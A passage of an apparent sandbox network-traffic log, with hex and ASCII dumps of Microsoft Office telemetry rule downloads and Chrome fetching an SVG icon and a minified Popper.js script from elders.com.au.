                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    116192.168.2.44989313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 427
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                    x-ms-request-id: 63ee9ccd-501e-005b-1e4b-2ed7f7000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080324Z-158dbd74bf4zb6hghC1SN1dd7n00000003qg000000004h8z
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    117192.168.2.44989213.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 502
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                    x-ms-request-id: fa46a579-901e-0016-6a5f-2eefe9000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080324Z-157b9fd754flfl4xhC1SN1waxc0000000450000000006f2q
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    118192.168.2.44989013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 411
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                    x-ms-request-id: 84934087-701e-0021-808e-2d3d45000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080324Z-157b9fd754fk82tlhC1SN1x7tg00000004a0000000000ty8
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    119192.168.2.449896162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC817OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:24 UTC583INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"c6-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-bur-kbur8200147-BUR
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730263299.112974,VS0,VS0,VE2
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 56971
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53bfab702e61-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC204INData Raw: 63 36 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 2e 30 35 38 38 35 20 36 4c 30 20 31 2e 31 30 30 33 35 4c 31 2e 31 33 36 33 34 20 30 4c 37 20 36 4c 31 2e 31 33 36 33 34 20 31 32 4c 30 20 31 30 2e 38 39 39 37 4c 35 2e 30 35 38 38 35 20 36 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                    Data Ascii: c6<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/></svg>
                                                                                                                                    2024-11-05 08:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    120192.168.2.449897162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC659OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:24 UTC617INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 29 Feb 2024 11:53:51 GMT
                                                                                                                                    etag: W/"34d7f-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Age: 367697
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210049-DFW
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1709603799.642047,VS0,VS0,VE4
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53bfaf5d0bd9-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC752INData Raw: 37 64 33 35 0d 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 0a 20 50 65 72 6d 69 73 73 69 6f 6e 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2c 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 20 6f 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 0a 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 0a 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69
                                                                                                                                    Data Ascii: 7d35/* Copyright (c) 2016 Federico Zivolo and contributors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restricti
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 0a 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 4e 4f 4e 49 4e 46 52 49 4e 47 45 4d 45 4e 54 2e 20 49 4e 20 4e 4f 20 45 56 45 4e 54 20 53 48 41 4c 4c 20 54 48 45 0a 20 41 55 54 48 4f 52 53 20 4f 52 20 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 0a 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46
                                                                                                                                    Data Ascii: WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING F
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 5b 75 5d 29 72 65 74 75 72 6e 20 58 5b 75 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 4d 3d 58 5b 75 5d 3d 7b 69 3a 75 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 73 61 5b 75 5d 2e 63 61 6c 6c 28 4d 2e 65 78 70 6f 72 74 73 2c 4d 2c 4d 2e 65 78 70 6f 72 74 73 2c 43 29 2c 4d 2e 6c 3d 21 30 2c 4d 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 58 3d 7b 7d 3b 43 2e 6d 3d 73 61 3b 43 2e 63 3d 58 3b 43 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 4d 2c 6c 61 29 7b 43 2e 6f 28 75 2c 4d 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 75 2c 4d 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6c 61 7d 29 7d 3b 43 2e 72 3d 66 75 6e 63 74 69 6f 6e 28 75 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f
                                                                                                                                    Data Ascii: [u])return X[u].exports;var M=X[u]={i:u,l:!1,exports:{}};return sa[u].call(M.exports,M,M.exports,C),M.l=!0,M.exports}var X={};C.m=sa;C.c=X;C.d=function(u,M,la){C.o(u,M)||Object.defineProperty(u,M,{enumerable:!0,get:la})};C.r=function(u){"undefined"!=typeo
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 6c 6f 77 58 29 3f 66 3a 69 61 28 6c 61 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 74 61 28 66 29 7b 72 65 74 75 72 6e 20 31 31 3d 3d 3d 66 3f 76 64 3a 31 30 3d 3d 3d 66 3f 77 64 3a 76 64 7c 7c 77 64 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 66 29 7b 69 66 28 21 66 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 66 6f 72 28 76 61 72 20 6b 3d 0a 74 61 28 31 30 29 3f 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3a 6e 75 6c 6c 2c 64 3d 66 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 7c 7c 6e 75 6c 6c 3b 64 3d 3d 3d 6b 26 26 66 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 29 64 3d 28 66 3d 66 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 29 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3b 72 65 74 75 72 6e
                                                                                                                                    Data Ascii: lowX)?f:ia(la(f))}function ta(f){return 11===f?vd:10===f?wd:vd||wd}function qa(f){if(!f)return document.documentElement;for(var k=ta(10)?document.body:null,d=f.offsetParent||null;d===k&&f.nextElementSibling;)d=(f=f.nextElementSibling).offsetParent;return
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 65 66 74 22 3a 22 54 6f 70 22 3b 76 61 72 20 64 3d 22 4c 65 66 74 22 3d 3d 3d 6b 3f 22 52 69 67 68 74 22 3a 22 42 6f 74 74 6f 6d 22 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 66 5b 22 62 6f 72 64 65 72 22 2b 6b 2b 22 57 69 64 74 68 22 5d 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 66 5b 22 62 6f 72 64 65 72 22 2b 64 2b 22 57 69 64 74 68 22 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 56 62 28 66 2c 6b 2c 64 2c 67 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 6b 5b 22 6f 66 66 73 65 74 22 2b 66 5d 2c 6b 5b 22 73 63 72 6f 6c 6c 22 2b 66 5d 2c 64 5b 22 63 6c 69 65 6e 74 22 2b 66 5d 2c 64 5b 22 6f 66 66 73 65 74 22 2b 66 5d 2c 64 5b 22 73 63 72 6f 6c 6c 22 2b 66 5d 2c 74 61 28 31 30 29 3f 70 61 72 73 65 49 6e 74 28 64 5b 22 6f 66 66 73 65 74 22 2b 66
                                                                                                                                    Data Ascii: eft":"Top";var d="Left"===k?"Right":"Bottom";return parseFloat(f["border"+k+"Width"])+parseFloat(f["border"+d+"Width"])}function Vb(f,k,d,g){return Math.max(k["offset"+f],k["scroll"+f],d["client"+f],d["offset"+f],d["scroll"+f],ta(10)?parseInt(d["offset"+f
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 70 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 70 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 67 26 26 6d 29 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 44 2e 6d 61 72 67 69 6e 54 6f 70 29 2c 44 3d 70 61 72 73 65 46 6c 6f 61 74 28 44 2e 6d 61 72 67 69 6e 4c 65 66 74 29 2c 70 2e 74 6f 70 2d 3d 4e 2d 6d 2c 70 2e 62 6f 74 74 6f 6d 2d 3d 4e 2d 6d 2c 70 2e 6c 65 66 74 2d 3d 47 2d 44 2c 70 2e 72 69 67 68 74 2d 3d 47 2d 44 2c 70 2e 6d 61 72 67 69 6e 54 6f 70 3d 6d 2c 70 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 44 3b 72 65 74 75 72 6e 28 67 26 26 21 64 3f 6b 2e 63 6f 6e 74 61 69 6e 73 28 41 29 3a 6b 3d 3d 3d 41 26 26 22 42 4f 44 59 22 21 3d 3d 41 2e 6e 6f 64 65 4e 61 6d
                                                                                                                                    Data Ascii: ,width:p.width,height:p.height});if(p.marginTop=0,p.marginLeft=0,!g&&m)m=parseFloat(D.marginTop),D=parseFloat(D.marginLeft),p.top-=N-m,p.bottom-=N-m,p.left-=G-D,p.right-=G-D,p.marginTop=m,p.marginLeft=D;return(g&&!d?k.contains(A):k===A&&"BODY"!==A.nodeNam
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 6d 3d 74 2b 6d 2e 74 6f 70 2c 70 2e 6c 65 66 74 2b 3d 6d 2e 6c 65 66 74 2d 6d 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 70 2e 72 69 67 68 74 3d 41 2b 6d 2e 6c 65 66 74 29 7d 6d 3d 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 28 64 3d 64 7c 7c 30 29 3b 72 65 74 75 72 6e 20 70 2e 6c 65 66 74 2b 3d 6d 3f 64 3a 64 2e 6c 65 66 74 7c 7c 0a 30 2c 70 2e 74 6f 70 2b 3d 6d 3f 64 3a 64 2e 74 6f 70 7c 7c 30 2c 70 2e 72 69 67 68 74 2d 3d 6d 3f 64 3a 64 2e 72 69 67 68 74 7c 7c 30 2c 70 2e 62 6f 74 74 6f 6d 2d 3d 6d 3f 64 3a 64 2e 62 6f 74 74 6f 6d 7c 7c 30 2c 70 7d 66 75 6e 63 74 69 6f 6e 20 49 62 28 66 2c 6b 2c 64 2c 67 2c 6d 29 7b 76 61 72 20 70 3d 35 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 35 5d
                                                                                                                                    Data Ascii: m=t+m.top,p.left+=m.left-m.marginLeft,p.right=A+m.left)}m="number"==typeof(d=d||0);return p.left+=m?d:d.left||0,p.top+=m?d:d.top||0,p.right-=m?d:d.right||0,p.bottom-=m?d:d.bottom||0,p}function Ib(f,k,d,g,m){var p=5<arguments.length&&void 0!==arguments[5]
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 66 3d 75 62 28 66 29 3b 76 61 72 20 67 3d 7b 77 69 64 74 68 3a 66 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 66 2e 68 65 69 67 68 74 7d 2c 6d 3d 2d 31 21 3d 3d 5b 22 72 69 67 68 74 22 2c 22 6c 65 66 74 22 5d 2e 69 6e 64 65 78 4f 66 28 64 29 2c 70 3d 6d 3f 22 74 6f 70 22 3a 22 6c 65 66 74 22 2c 74 3d 6d 3f 22 6c 65 66 74 22 3a 22 74 6f 70 22 2c 41 3d 6d 3f 22 68 65 69 67 68 74 22 3a 22 77 69 64 74 68 22 3b 72 65 74 75 72 6e 20 67 5b 70 5d 3d 6b 5b 70 5d 2b 6b 5b 41 5d 2f 32 2d 66 5b 41 5d 2f 32 2c 67 5b 74 5d 3d 64 3d 3d 3d 74 3f 6b 5b 74 5d 2d 66 5b 6d 3f 22 77 69 64 74 68 22 3a 22 68 65 69 67 68 74 22 5d 3a 6b 5b 62 62 28 74 29 5d 2c 67 7d 66 75 6e 63 74 69 6f 6e 20 63 62 28 66 2c 6b 29 7b 72 65 74 75 72 6e 20 41 72 72
                                                                                                                                    Data Ascii: lit("-")[0];f=ub(f);var g={width:f.width,height:f.height},m=-1!==["right","left"].indexOf(d),p=m?"top":"left",t=m?"left":"top",A=m?"height":"width";return g[p]=k[p]+k[A]/2-f[A]/2,g[t]=d===t?k[t]-f[m?"width":"height"]:k[bb(t)],g}function cb(f,k){return Arr
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 63 72 6f 6c 6c 22 2c 64 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 64 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 29 2c 64 2e 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 3d 66 2c 64 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 3d 21 30 2c 64 7d 66 75 6e 63 74 69 6f 6e 20 76 61 28 29 7b 76 61 72 20 66 2c 6b 3b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 26 26 28 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 28 66 3d 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 6b 3d 74 68 69 73 2e 73 74 61 74 65 2c 4b 62 28 66 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6b 2e 75 70 64 61 74 65 42 6f
                                                                                                                                    Data Ascii: croll",d.updateBound,d.scrollParents),d.scrollElement=f,d.eventsEnabled=!0,d}function va(){var f,k;this.state.eventsEnabled&&(cancelAnimationFrame(this.scheduleUpdate),this.state=(f=this.reference,k=this.state,Kb(f).removeEventListener("resize",k.updateBo
